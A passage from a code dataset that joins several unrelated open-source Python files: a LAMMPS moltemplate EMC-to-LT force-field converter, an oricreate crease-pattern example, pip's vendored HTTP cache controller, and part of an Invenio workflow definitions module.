except UnicodeDecodeError:
return None
if encoding:
canonicalName = ascii_punctuation_re.sub("", encoding).lower()
return encodings.get(canonicalName, None)
else:
return None
| mpl-2.0 |
ibethune/lammps | tools/moltemplate/moltemplate/force_fields/convert_EMC_files_to_LT_files/emcprm2lt.py | 3 | 24145 | #!/usr/bin/python
import os, sys, getopt
import datetime
__version__ = 0.2
#################### UNITS ####################
# Only used with --units flag
econv = 1.0 # Additional Factor for unit conversion if needed (energies)
lconv = 1.0 # Additional Factor for unit conversion if neededa (lengths)
dconv = 1.0 # Additional Factor for unit conversion if neededa (densities)
###############################################
print('\nEMC 2 LT conversion tool: v%s\n' % __version__)
def helpme():
print 'Help for the EMC 2 LT conversion tool\n'
print 'Input takes a list of files in EMC .prm format to be read.'
print 'Additional styles (bond, angle, etc) can be modified via the',\
'command line. Any valid LAMMPS style can be used.\n'
print 'Styles include:'
print '--pair-style='
print '--bond-style='
print '--angle-style='
print '--dihedral-style='
print '--improper-style=\n'
print 'Default styles are lj/cut/coul/long, harmonic, harmonic, harmonic,',\
'harmonic \n'
print 'Other commands:'
print '--name= provides basename for output file if desired\n'
print '--units flag for manual units (no parameter needed)\n'
print 'Usage example:'
print 'emcprm2lt.py file1 file2 --bond-style=harmonic --angle-style=harmonic'
print ''
def Abort():
print 'Aborting...'
sys.exit()
def WriteInit():
# Write generic LAMMPS settings, likely need additional on a per-ff basis
foutput.write(' write_once("In Init") {\n')
foutput.write(' # Warning: This is a very generic "In Init" section, further\n')
foutput.write(' # modification prior to any simulation is extremely likely\n')
foutput.write(' units real\n')
foutput.write(' atom_style full\n')
foutput.write(' bond_style hybrid %s\n' % bstyle)
if angle_flag:
foutput.write(' angle_style hybrid %s\n' % astyle)
if torsion_flag:
foutput.write(' dihedral_style hybrid %s\n' % dstyle)
if improp_flag:
foutput.write(' improper_style hybrid %s\n' % istyle)
foutput.write(' pair_style hybrid %s %f %f\n' % (pstyle,
float(inner[0])*lconv, float(cutoff[0])*lconv))
if pair14[0] == 'OFF':
foutput.write(' special_bonds lj/coul 0.0 0.0 0.0\n')
else:
print 'Warning: special_bonds needed, add to "In Init" section\n'
foutput.write(' } # end init\n')
def Units(length_flag, energy_flag, density_flag):
# Check flags for all units, determine what conversions are needed, hard-coded for LAMMPS 'real'
print 'Attempting to auto-convert units... This should always be double-checked',\
' especially for unique potential styles'
global lconv; global econv; global dconv
if length_flag:
print 'Warning: length scale does not match LAMMPS real units, attempting conversion to angstroms'
if length[0] == 'NANOMETER':
lconv = 10.0
print ' nanometer -> angstrom'
elif length[0] == 'MICROMETER':
lconv = 10000.0
print ' micrometer -> angstrom'
elif length[0] == 'METER':
lconv = 10000000000.0
print ' meter -> angstrom'
else:
print 'Length units NOT converted'
if energy_flag:
print 'Warning: energy units do not match LAMMPS real units, attempting conversion to kcal/mol'
if energy[0] == 'KJ/MOL':
econv = 0.239006
print ' kj/mol -> kcal/mol'
elif energy[0] == 'J/MOL':
econv = 0.000239006
print ' j/mol -> kcal/mol'
elif energy[0] == 'CAL/MOL':
econv = 0.001
print ' cal/mol -> kcal/mol'
else:
print 'Energy units NOT converted'
if density_flag:
print 'Warning: density units do not match LAMMPS real units, attempting conversion to gram/cm^3'
if density[0] == 'KG/M^3':
dconv = 0.001
print ' kg/m^3 -> g/cm^3'
else:
print 'Density units NOT converted'
return lconv, econv, dconv
def ChkPotential(manual_flag, angle_flag, torsion_flag, improp_flag):
# Check type of potential, determine type of unit conversion is necessary
global beconv
if angle_flag:
global aeconv
if torsion_flag:
global deconv
if improp_flag:
global ieconv
if manual_flag == False:
# Chk bond potential
if bstyle == '' or bstyle == 'harmonic':
beconv = econv / (2*pow(lconv,2))
else:
print 'Cannot find bond potential type, use manual units'
Abort()
if angle_flag:
if astyle == '' or astyle == 'harmonic':
aeconv = econv
elif astyle == 'cosine/squared':
aeconv = econv / 2
elif astyle == 'sdk':
aeconv = econv
else:
print 'Cannot find angle potential type, use manual units'
Abort()
# torsion and improper not implemented fully
elif torsion_flag:
if dstyle == '' or dstyle == 'harmonic':
deconv = econv
else:
print 'Cannot find torsion potential type, use manual units'
Abort()
elif improp_flag:
if istyle == '' or istyle == 'harmonic':
ieconv = econv
else:
print 'Cannot find improper potential type, use manual units'
Abort()
else:
# Modify as needed
print 'Warning: Manual units used, set potential conversion units in script'
beconv = 1
if angle_flag:
aeconv = 1
if torsion_flag:
deconv = 1
if improp_flag:
ieconv = 1
### Parse input ###
if len(sys.argv) == 1:
helpme()
sys.exit()
manual_units = False # Turned on via command line
args = list(sys.argv[1:])
myopts, args = getopt.gnu_getopt(args, 'fh', ['pair-style=', 'bond-style=', 'angle-style=',
'dihedral-style=', 'improper-style=', 'name=', 'units'])
filenames = list(args)
pstyle = ''; bstyle = ''; astyle = ''; dstyle = ''; istyle = ''
name = ''
for opt, arg in myopts:
if opt in ('-f'):
filenames = arg
elif opt in ('--pair-style'):
pstyle = arg
elif opt in ('--bond-style'):
bstyle = arg
elif opt in ('--angle-style'):
astyle = arg
elif opt in ('--dihedral-style'):
dstyle = arg
elif opt in ('--improper-style'):
istyle = arg
elif opt in ('--name'):
name = arg
elif opt in ('--units'):
manual_units = True
print 'Manual units enabled, modify python script accordingly'
elif opt in ('-h', '--help'):
helpme()
sys.exit()
### Check input filenames, make sure they exist ###
print 'Converting: '
for i in range(len(filenames)):
if os.path.isfile(filenames[i]):
print '', filenames[i]
else:
print 'invalid filename:', filenames[i]
Abort()
print 'from EMC .prm to moltemplate .lt format\n'
### Open all files ###
f = [open(fname, 'r') for fname in filenames]
### All these settings from DEFINE should be list of fixed size ###
ffname = [[] for i in range(len(f))]
fftype = [[] for i in range(len(f))]
version = [[] for i in range(len(f))]
created1 = [[] for i in range(len(f))]
created2 = [[] for i in range(len(f))]
length = [[] for i in range(len(f))]
energy = [[] for i in range(len(f))]
density = [[] for i in range(len(f))]
mix = [[] for i in range(len(f))]
nbonded = [[] for i in range(len(f))]
inner = [[] for i in range(len(f))]
cutoff = [[] for i in range(len(f))]
pair14 = [[] for i in range(len(f))]
angle_def = [[] for i in range(len(f))]
torsion_def = [[] for i in range(len(f))]
improp_def = [[] for i in range(len(f))] # not all prm have this
### Parse DEFINE section, save info for each file ###
for i in range(len(f)):
grab = False
for line in f[i]:
if line.strip() == 'ITEM DEFINE':
grab = True
elif line.strip() == 'ITEM END':
grab = False
elif grab:
if line.startswith('FFNAME'):
ffname[i] = line.split()[1].strip()
if line.startswith('FFTYPE'):
fftype[i] = line.split()[1].strip()
if line.startswith('VERSION'):
version[i] = line.split()[1].strip()
if line.startswith('CREATED'):
created1[i] = line.split()[1].strip()
created2[i] = line.split()[2].strip()
if line.startswith('LENGTH'):
length[i] = line.split()[1].strip()
if line.startswith('ENERGY'):
energy[i] = line.split()[1].strip()
if line.startswith('DENSITY'):
density[i] = line.split()[1].strip()
if line.startswith('MIX'):
mix[i] = line.split()[1].strip()
if line.startswith('NBONDED'):
nbonded[i] = line.split()[1].strip()
if line.startswith('INNER'):
inner[i] = line.split()[1].strip()
if line.startswith('CUTOFF'):
cutoff[i] = line.split()[1].strip()
if line.startswith('PAIR14'):
pair14[i] = line.split()[1].strip()
if line.startswith('ANGLE'):
angle_def[i] = line.split()[1].strip()
if line.startswith('TORSION'):
torsion_def[i] = line.split()[1].strip()
if line.startswith('IMPROP'):
improp_def[i] = line.split()[1].strip()
### Sanity Checks ###
for i in range(len(f)):
for j in range(len(f)):
if ffname[j] != ffname[i]:
print 'force field files do not match'
Abort()
if length[j] != length[i]:
print 'units not identical between files'
Abort()
if energy[j] != energy[i]:
print 'units not identical between files'
Abort()
if density[j] != density[i]:
print 'units not identical between files'
Abort()
if inner[j] != inner[i]:
print 'inner cutoff not identical between files'
Abort()
if cutoff[j] != cutoff[i]:
print 'cutoff not identical between files'
Abort()
if pair14[j] != pair14[i]:
print '1-4 pair interaction not consistent between files'
Abort()
### Check if sections exist in PRM file ###
angle_flag = False; torsion_flag = False; improp_flag = False
for i in range(len(f)):
if angle_def[i] == 'WARN':
angle_flag = True
if torsion_def[i] == 'WARN':
torsion_flag = True
if improp_def[i] == 'WARN':
improp_flag = True
### Check which units to use, trip convert flags ###
length_flag = False; energy_flag = False; density_flag = False
if length[0] != 'ANGSTROM':
length_flag = True
if energy[0] != 'KCAL/MOL':
energy_flag = True
if density[0] != 'G/CC':
density_flag = True
if manual_units == True:
length_flag = False
energy_flag = False
density_flag = False
Units(length_flag, energy_flag, density_flag)
### Read Whole File, save to lists ###
# Non-crucial sections include
# BONDS, ANGLE, TORSION, IMPROP, NONBOND
# Read all sections every time, only output sections when flags tripped
f = [open(fname, 'r') for fname in filenames]
masses = []; nonbond = []; bond = []; angle = []; torsion = []; improp = []
equiv = []
for i in range(len(f)):
MASS = False
NONBOND = False
BOND = False
ANGLE = False
TORSION = False
IMPROP = False
EQUIV = False
for line in f[i]:
if line.strip() == 'ITEM MASS':
MASS = True
elif line.strip() == 'ITEM END':
MASS = False
elif MASS:
if not line.startswith('#'):
if not line.startswith('\n'):
masses.append(line.strip().split())
if line.strip() == 'ITEM NONBOND':
NONBOND = True
elif line.strip() == 'ITEM END':
NONBOND = False
elif NONBOND:
if not line.startswith('#'):
if not line.startswith('\n'):
nonbond.append(line.strip().split())
if line.strip() == 'ITEM BOND':
BOND = True
elif line.strip() == 'ITEM END':
BOND = False
elif BOND:
if not line.startswith('#'):
if not line.startswith('\n'):
bond.append(line.strip().split())
if line.strip() == 'ITEM ANGLE':
ANGLE = True
elif line.strip() == 'ITEM END':
ANGLE = False
elif ANGLE:
if not line.startswith('#'):
if not line.startswith('\n'):
angle.append(line.strip().split())
if line.strip() == 'ITEM TORSION':
TORSION = True
elif line.strip() == 'ITEM END':
TORSION = False
elif TORSION:
if not line.startswith('#'):
if not line.startswith('\n'):
torsion.append(line.strip().split())
if line.strip() == 'ITEM IMPROP':
IMPROP = True
elif line.strip() == 'ITEM END':
IMPROP = False
elif IMPROP:
if not line.startswith('#'):
if not line.startswith('\n'):
improp.append(line.strip().split())
if line.strip() == 'ITEM EQUIVALENCE':
EQUIV = True
elif line.strip() == 'ITEM END':
EQUIV = False
elif EQUIV:
if not line.startswith('#'):
if not line.startswith('\n'):
equiv.append(line.strip().split())
### Close prm files ###
for fname in f:
fname.close()
### Sanity checks before writing LT files ###
# Check Equiv
for i in range(len(equiv)):
for j in range(len(equiv)):
if (equiv[i][0] == equiv[j][0]) and (equiv[i] != equiv[j]):
print 'Error: Identical atom types with different equivalences'
Abort()
# Check Masses
for i in range(len(masses)):
for j in range(len(masses)):
if (masses[i][0] == masses[j][0]) and (masses[i][1] != masses[j][1]):
print 'Error: Identical types with different mass'
Abort()
# Check Nonbond
for i in range(len(nonbond)):
for j in range(len(nonbond)):
if (nonbond[i][0] == nonbond[j][0]) and (nonbond[i][1] == nonbond[j][1]) and ((nonbond[i][2] != nonbond[j][2]) or (nonbond[i][3] != nonbond[j][3])):
print nonbond[i], nonbond[j]
print 'Error: Identical types with different pair-interactions'
Abort()
### Remove double equivalences ###
for i in range(len(equiv)):
once = True
for j in range(len(equiv)):
if (equiv[i][0] == equiv[j][0]) and once:
once = False
elif (equiv[i][0] == equiv[j][0]):
equiv[j][1] = None
equiv[j][2] = 'duplicate'
if len(equiv[i]) != 6:
print 'Warning: Incorrect equivalence formatting for type %s' % equiv[i][0],\
'skipping type, topology may not be complete'
equiv[i][1] = None
equiv[i][2] = 'invalid_format'
### Check Potential Styles and Set Units ###
ChkPotential(manual_units, angle_flag, torsion_flag, improp_flag)
### Set output LT file ###
fname = 'ff_output.lt'
if name == '':
fname = ffname[0] + '.lt'
else:
fname = name + '.lt'
foutput = open(fname, 'w')
### Output to LT format ###
foutput.write('# Autogenerated by EMC 2 LT tool v%s on %s\n' % (__version__, str(datetime.date.today())))
foutput.write('#\n# ')
for i in range(len(sys.argv)):
foutput.write('%s ' % sys.argv[i])
foutput.write('\n')
foutput.write('#\n')
foutput.write('# Adapted from EMC by Pieter J. in \'t Veld\n')
foutput.write('# Originally written as, FFNAME:%s STYLE:%s VERSION:%s on %s %s\n' %
(ffname[0], fftype[0], version[0], created1[0], created2[0]))
foutput.write('\n')
foutput.write('%s {\n' % ffname[0])
# Charges not necessary? emc file assign charges in smiles, which would
# be in the per-molecule files created by moltemplate user... not here
### Mass Info ###
foutput.write(' write_once("Data Masses") {\n')
for i in range(len(masses)):
if equiv[i][1] != None:
foutput.write(' @atom:%s %f # %s\n' %
(masses[i][0], float(masses[i][1]), masses[i][0]))
foutput.write(' } # end of atom masses\n\n')
### Equiv Info ###
# Write Equivalence
foutput.write(' # ----- EQUIVALENCE CATEGORIES for bonded interaction lookup -----\n')
for i in range(len(equiv)):
if equiv[i][1] != None:
foutput.write(' replace{ @atom:%s @atom:%s_b%s_a%s_d%s_i%s}\n' %
(equiv[i][0], equiv[i][0], equiv[i][2], equiv[i][3], equiv[i][4], equiv[i][5]))
foutput.write(' # END EQUIVALENCE\n\n')
# Sanity check equivalences vs masses
for i in range(len(equiv)):
check = None
for j in range(len(masses)):
if equiv[i][0] == masses[j][0]:
check = 'success'
if check == None:
print equiv[i], masses[j]
print 'Atom defined in Equivlances, but not found in Masses'
Abort()
# Sanity check masses vs equivalences
for i in range(len(masses)):
check = None
for j in range(len(masses)):
if masses[i][0] == equiv[j][0]:
check = 'success'
if check == None:
print masses[i], equiv[j]
print 'Atom defined in Masses, but not found in Equivlances'
Abort()
### Nonbonded Info ###
if pstyle == '':
print 'Warning: no non-bonded potential provided, assuming lj/cut/coul/long'
pstyle = 'lj/cut/coul/long'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Non-Bonded interactions -----\n')
# Add new types from equivalence
for i in range(len(equiv)):
once = True
for j in range(len(nonbond)):
# Get terms for new types
if (equiv[i][0] != equiv[i][1]) and (equiv[i][1] == nonbond[j][0]):
if not equiv[i][1] == nonbond[j][1]:
line = '%s %s %s %s' % (equiv[i][0], nonbond[j][1], nonbond[j][2], nonbond[j][3])
nonbond.append(line.split())
if once:
once = False
line = '%s %s %s %s' % (equiv[i][0], equiv[i][0], nonbond[j][2], nonbond[j][3])
nonbond.append(line.split())
if (equiv[i][0] != equiv[i][1]) and (equiv[i][1] == nonbond[j][1]):
line = '%s %s %s %s' % (equiv[i][0], nonbond[j][0], nonbond[j][2], nonbond[j][3])
if line.split() != nonbond[-1]:
nonbond.append(line.split())
for i in range(len(nonbond)):
atom1name = None
atom2name = None
stylename = pstyle
if pstyle == 'lj/sdk' or pstyle == 'lj/sdk/coul/long':
stylename = 'lj%s_%s' % (nonbond[i][4], nonbond[i][5])
# Cross Terms + Diagonal, normal
for j in range(len(equiv)):
if nonbond[i][0] == equiv[j][0]:
atom1name = '%s_b%s_a%s_d%s_i%s' % (nonbond[i][0], equiv[j][2], equiv[j][3], equiv[j][4], equiv[j][5])
if nonbond[i][1] == equiv[j][0]:
atom2name = '%s_b%s_a%s_d%s_i%s' % (nonbond[i][1], equiv[j][2], equiv[j][3], equiv[j][4], equiv[j][5])
if atom1name == None or atom2name == None:
print atom1name, atom2name, nonbond[i]
print 'Error: Atom in Nonbonded Pairs not found in Equivalences'
Abort()
foutput.write(' pair_coeff @atom:%s @atom:%s %s %f %f' %
(atom1name, atom2name, stylename, float(nonbond[i][3])*econv, float(nonbond[i][2])*lconv))
foutput.write(' # %s-%s\n' % (nonbond[i][0], nonbond[i][1]))
foutput.write(' } # end of nonbonded parameters\n\n')
### Bond Info ###
if bstyle == '':
print 'Warning: no bond potential provided, assuming harmonic'
bstyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Bonds -----\n')
for i in range(len(bond)):
foutput.write(' bond_coeff @bond:%s-%s %s %f %f' %
(bond[i][0], bond[i][1], bstyle, float(bond[i][2])*beconv, float(bond[i][3])*lconv))
foutput.write(' # %s-%s\n' % (bond[i][0], bond[i][1]))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Bonds By Type") {\n')
for i in range(len(bond)):
foutput.write(' @bond:%s-%s @atom:*_b%s_a*_d*_i* @atom:*_b%s_a*_d*_i*\n' %
(bond[i][0], bond[i][1], bond[i][0], bond[i][1]))
foutput.write(' } # end of bonds\n\n')
### Angle Info ###
if angle_flag:
if astyle == '':
print 'Warning: no angle potential provided, assuming harmonic'
astyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Angles -----\n')
for i in range(len(angle)):
if (len(angle[i]) > 5): # Check if extra data in angle array
foutput.write(' angle_coeff @angle:%s-%s-%s %s %f %f' %
(angle[i][0], angle[i][1], angle[i][2], str(angle[i][5]), float(angle[i][3])*aeconv, float(angle[i][4])))
foutput.write(' # %s-%s-%s\n' % (angle[i][0], angle[i][1], angle[i][2]))
else:
foutput.write(' angle_coeff @angle:%s-%s-%s %s %f %f' %
(angle[i][0], angle[i][1], angle[i][2], astyle, float(angle[i][3])*aeconv, float(angle[i][4])))
foutput.write(' # %s-%s-%s\n' % (angle[i][0], angle[i][1], angle[i][2]))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Angles By Type") {\n')
for i in range(len(angle)):
foutput.write(' @angle:%s-%s-%s @atom:*_b*_a%s_d*_i* @atom:*_b*_a%s_d*_i* @atom:*_b*_a%s_d*_i*\n' %
(angle[i][0], angle[i][1], angle[i][2], angle[i][0], angle[i][1], angle[i][2]))
foutput.write(' } # end of angles\n\n')
### Torsion/Dihedral Info ###a
# Incomplete
if torsion_flag:
if dstyle == '':
print 'Warning: no dihedral/torsion potential provided, assuming harmonic'
dstyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Dihedrals -----\n')
for i in range(len(torsion)):
foutput.write(' dihedral_coeff @dihedral:%s-%s-%s-%s %s %f %f %f %f\n' %
(torsion[i][0], torsion[i][1], torsion[i][2], torsion[i][3], dstyle, float(torsion[i][4])*deconv, float(torsion[i][5]), float(torsion[i][6])))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Dihedrals By Type") {\n')
for i in range(len(torsion)):
foutput.write(' @dihedral:%s-%s-%s-%s @atom:*_b*_a*_d%s_i* @atom:*_b*_a*_d%s_i* @atom:*_b*_a*_d%s_i* @atom:*_b*_a*_d%s_i*' %
(torsion[i][0], torsion[i][1], torsion[i][2], torsion[i][3], torsion[i][0], torsion[i][1], torsion[i][2], torsion[i][3]))
foutput.write(' } # end of dihedrals\n\n')
### Improper Info ###
# Incomplete
ieconv = econv # improper coeff conversion
if improp_flag:
if istyle == '':
print 'Warning: no improper potential provided, assuming harmonic'
istyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Impropers -----\n')
# As discussed, a check for convention of impropers is probably needed here
for i in range(len(improp)):
foutput.write(' improper_coeff @improper:%s-%s-%s-%s %s %f %f\n' %
(improp[i][0], improp[i][1], improp[i][2], improp[i][3], istyle,
float(improp[i][4]), float(improp[i][5])))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Impropers By Type") {\n')
for i in range(len(improp)):
foutput.write(' @improper:%s-%s-%s-%s @atom:*_b*_a*_d*_i%s @atom:*_b*_a*_d*_i%s @atom:*_b*_a*_d*_i%s @atom:*_b*_a*_d*_i%s' %
(improp[i][0], improp[i][1], improp[i][2], improp[i][3], improp[i][0], improp[i][1], improp[i][2], improp[i][3]))
foutput.write(' } # end of impropers\n\n')
### Initialization Info ###
print 'Warning: Attempting to write generic "In Init" section,',\
'further modification after this script is extremely likely'
WriteInit()
foutput.write('} # %s\n' % ffname[0])
sys.exit()
| gpl-2.0 |
simvisage/oricreate | docs/howtos/ex04_cp_operators/cp_F_L_bases.py | 1 | 1043 | r'''
This example demonstrates the crease pattern factory usage
for Yoshimura crease pattern.
'''
def create_cp():
# begin
from oricreate.api import CreasePatternState
import numpy as np
x = np.array([[0, 0, 0],
[1, 0, 0],
[1, 1, 0],
[2, 1, 0]
], dtype='float_')
L = np.array([[0, 1], [1, 2], [2, 0],
[1, 3], [2, 3]],
dtype='int_')
F = np.array([[0, 1, 2],
[1, 3, 2],
], dtype='int_')
cp = CreasePatternState(X=x,
L=L,
F=F)
print('Initial configuration')
print('Orthonormal base vectors of a first edge\n', cp.F_L_bases[:, 0, :, :])
return cp
cp.u[1, 2] = 1.0
cp.u[2, 2] = 1.0
cp.u = cp.u
print('Displaced configuration')
print('Orthonormal base vectors of a first edge r\n', cp.F_L_bases[:, 0, :, :])
# end
return cp
if __name__ == '__main__':
create_cp()
| gpl-3.0 |
compiteing/flask-ponypermission | venv/lib/python2.7/site-packages/pip/_vendor/cachecontrol/controller.py | 317 | 10124 | """
The httplib2 algorithms ported for use with requests.
"""
import re
import calendar
import time
from email.utils import parsedate_tz
from pip._vendor.requests.structures import CaseInsensitiveDict
from .cache import DictCache
from .serialize import Serializer
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")
def parse_uri(uri):
"""Parses a URI using the regex given in Appendix B of RFC 3986.
(scheme, authority, path, query, fragment) = parse_uri(uri)
"""
groups = URI.match(uri).groups()
return (groups[1], groups[3], groups[4], groups[6], groups[8])
class CacheController(object):
"""An interface to see if request should cached or not.
"""
def __init__(self, cache=None, cache_etags=True, serializer=None):
self.cache = cache or DictCache()
self.cache_etags = cache_etags
self.serializer = serializer or Serializer()
@classmethod
def _urlnorm(cls, uri):
"""Normalize the URL to create a safe key for the cache"""
(scheme, authority, path, query, fragment) = parse_uri(uri)
if not scheme or not authority:
raise Exception("Only absolute URIs are allowed. uri = %s" % uri)
scheme = scheme.lower()
authority = authority.lower()
if not path:
path = "/"
# Could do syntax based normalization of the URI before
# computing the digest. See Section 6.2.2 of Std 66.
request_uri = query and "?".join([path, query]) or path
defrag_uri = scheme + "://" + authority + request_uri
return defrag_uri
@classmethod
def cache_url(cls, uri):
return cls._urlnorm(uri)
def parse_cache_control(self, headers):
"""
Parse the cache control headers returning a dictionary with values
for the different directives.
"""
retval = {}
cc_header = 'cache-control'
if 'Cache-Control' in headers:
cc_header = 'Cache-Control'
if cc_header in headers:
parts = headers[cc_header].split(',')
parts_with_args = [
tuple([x.strip().lower() for x in part.split("=", 1)])
for part in parts if -1 != part.find("=")
]
parts_wo_args = [
(name.strip().lower(), 1)
for name in parts if -1 == name.find("=")
]
retval = dict(parts_with_args + parts_wo_args)
return retval
def cached_request(self, request):
"""
Return a cached response if it exists in the cache, otherwise
return False.
"""
cache_url = self.cache_url(request.url)
cc = self.parse_cache_control(request.headers)
# non-caching states
no_cache = True if 'no-cache' in cc else False
if 'max-age' in cc and cc['max-age'] == 0:
no_cache = True
# Bail out if no-cache was set
if no_cache:
return False
# It is in the cache, so lets see if it is going to be
# fresh enough
resp = self.serializer.loads(request, self.cache.get(cache_url))
# Check to see if we have a cached object
if not resp:
return False
# If we have a cached 301, return it immediately. We don't
# need to test our response for other headers b/c it is
# intrinsically "cacheable" as it is Permanent.
# See:
# https://tools.ietf.org/html/rfc7231#section-6.4.2
#
# Client can try to refresh the value by repeating the request
# with cache busting headers as usual (ie no-cache).
if resp.status == 301:
return resp
headers = CaseInsensitiveDict(resp.headers)
if not headers or 'date' not in headers:
# With date or etag, the cached response can never be used
# and should be deleted.
if 'etag' not in headers:
self.cache.delete(cache_url)
return False
now = time.time()
date = calendar.timegm(
parsedate_tz(headers['date'])
)
current_age = max(0, now - date)
# TODO: There is an assumption that the result will be a
# urllib3 response object. This may not be best since we
# could probably avoid instantiating or constructing the
# response until we know we need it.
resp_cc = self.parse_cache_control(headers)
# determine freshness
freshness_lifetime = 0
# Check the max-age pragma in the cache control header
if 'max-age' in resp_cc and resp_cc['max-age'].isdigit():
freshness_lifetime = int(resp_cc['max-age'])
# If there isn't a max-age, check for an expires header
elif 'expires' in headers:
expires = parsedate_tz(headers['expires'])
if expires is not None:
expire_time = calendar.timegm(expires) - date
freshness_lifetime = max(0, expire_time)
# determine if we are setting freshness limit in the req
if 'max-age' in cc:
try:
freshness_lifetime = int(cc['max-age'])
except ValueError:
freshness_lifetime = 0
if 'min-fresh' in cc:
try:
min_fresh = int(cc['min-fresh'])
except ValueError:
min_fresh = 0
# adjust our current age by our min fresh
current_age += min_fresh
# see how fresh we actually are
fresh = (freshness_lifetime > current_age)
if fresh:
return resp
# we're not fresh. If we don't have an Etag, clear it out
if 'etag' not in headers:
self.cache.delete(cache_url)
# return the original handler
return False
def conditional_headers(self, request):
cache_url = self.cache_url(request.url)
resp = self.serializer.loads(request, self.cache.get(cache_url))
new_headers = {}
if resp:
headers = CaseInsensitiveDict(resp.headers)
if 'etag' in headers:
new_headers['If-None-Match'] = headers['ETag']
if 'last-modified' in headers:
new_headers['If-Modified-Since'] = headers['Last-Modified']
return new_headers
def cache_response(self, request, response, body=None):
"""
Algorithm for caching requests.
This assumes a requests Response object.
"""
# From httplib2: Don't cache 206's since we aren't going to
# handle byte range requests
if response.status not in [200, 203, 300, 301]:
return
response_headers = CaseInsensitiveDict(response.headers)
cc_req = self.parse_cache_control(request.headers)
cc = self.parse_cache_control(response_headers)
cache_url = self.cache_url(request.url)
# Delete it from the cache if we happen to have it stored there
no_store = cc.get('no-store') or cc_req.get('no-store')
if no_store and self.cache.get(cache_url):
self.cache.delete(cache_url)
# If we've been given an etag, then keep the response
if self.cache_etags and 'etag' in response_headers:
self.cache.set(
cache_url,
self.serializer.dumps(request, response, body=body),
)
# Add to the cache any 301s. We do this before looking that
# the Date headers.
elif response.status == 301:
self.cache.set(
cache_url,
self.serializer.dumps(request, response)
)
# Add to the cache if the response headers demand it. If there
# is no date header then we can't do anything about expiring
# the cache.
elif 'date' in response_headers:
# cache when there is a max-age > 0
if cc and cc.get('max-age'):
if int(cc['max-age']) > 0:
self.cache.set(
cache_url,
self.serializer.dumps(request, response, body=body),
)
# If the request can expire, it means we should cache it
# in the meantime.
elif 'expires' in response_headers:
if response_headers['expires']:
self.cache.set(
cache_url,
self.serializer.dumps(request, response, body=body),
)
def update_cached_response(self, request, response):
"""On a 304 we will get a new set of headers that we want to
update our cached value with, assuming we have one.
This should only ever be called when we've sent an ETag and
gotten a 304 as the response.
"""
cache_url = self.cache_url(request.url)
cached_response = self.serializer.loads(
request,
self.cache.get(cache_url)
)
if not cached_response:
# we didn't have a cached response
return response
# Lets update our headers with the headers from the new request:
# http://tools.ietf.org/html/draft-ietf-httpbis-p4-conditional-26#section-4.1
#
# The server isn't supposed to send headers that would make
# the cached body invalid. But... just in case, we'll be sure
# to strip out ones we know that might be problmatic due to
# typical assumptions.
excluded_headers = [
"content-length",
]
cached_response.headers.update(
dict((k, v) for k, v in response.headers.items()
if k.lower() not in excluded_headers)
)
# we want a 200 b/c we have content via the cache
cached_response.status = 200
# update our cache
self.cache.set(
cache_url,
self.serializer.dumps(request, cached_response),
)
return cached_response
| mit |
Theer108/invenio | invenio/modules/workflows/definitions.py | 13 | 5875 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Contains basic workflow types for use in workflow definitions."""
import collections
from six import string_types
class WorkflowMissing(object):
"""Placeholder workflow definition."""
workflow = [lambda obj, eng: None]
class WorkflowBase(object):
"""Base class for workflow definition.
Interface to define which functions should be imperatively implemented.
All workflows should inherit from this class.
"""
@staticmethod
def get_title(bwo, **kwargs):
"""Return the value to put in the title column of HoldingPen."""
return "No title"
@staticmethod
def get_description(bwo, **kwargs):
"""Return the value to put in the title column of HoldingPen."""
return "No description"
@staticmethod
def formatter(obj, **kwargs):
"""Format the object."""
return "No data"
class RecordWorkflow(WorkflowBase):
"""Workflow to be used where BibWorkflowObject is a Record instance."""
workflow = []
@staticmethod
def get_title(bwo):
"""Get the title."""
field_map = {"title": "title"}
record = bwo.get_data()
extracted_titles = []
if hasattr(record, "get") and "title" in record:
if isinstance(record["title"], str):
extracted_titles = [record["title"]]
else:
extracted_titles.append(record["title"][field_map["title"]])
return ", ".join(extracted_titles) or "No title found"
@staticmethod
def get_description(bwo):
"""Get the description (identifiers and categories) from the object data."""
from invenio.modules.records.api import Record
from flask import render_template, current_app
record = bwo.get_data()
final_identifiers = {}
try:
identifiers = Record(record.dumps()).persistent_identifiers
for values in identifiers.values():
final_identifiers.extend([i.get("value") for i in values])
except Exception:
current_app.logger.exception("Could not get identifiers")
if hasattr(record, "get"):
final_identifiers = [
record.get("system_control_number", {}).get("value", 'No ids')
]
else:
final_identifiers = []
categories = []
if hasattr(record, "get"):
if 'subject' in record:
lookup = ["subject", "term"]
elif "subject_term" in record:
lookup = ["subject_term", "term"]
else:
lookup = None
if lookup:
primary, secondary = lookup
category_list = record.get(primary, [])
if isinstance(category_list, dict):
category_list = [category_list]
categories = [subject[secondary] for subject in category_list]
return render_template('workflows/styles/harvesting_record.html',
categories=categories,
identifiers=final_identifiers)
@staticmethod
def formatter(bwo, **kwargs):
"""Nicely format the record."""
from pprint import pformat
from invenio.modules.records.api import Record
data = bwo.get_data()
if not data:
return ''
formatter = kwargs.get("formatter", None)
of = kwargs.get("of", None)
if formatter:
# A separate formatter is supplied
return formatter(data)
if isinstance(data, collections.Mapping):
# Dicts are cool on its own, but maybe its SmartJson (record)
try:
data = Record(data.dumps()).legacy_export_as_marc()
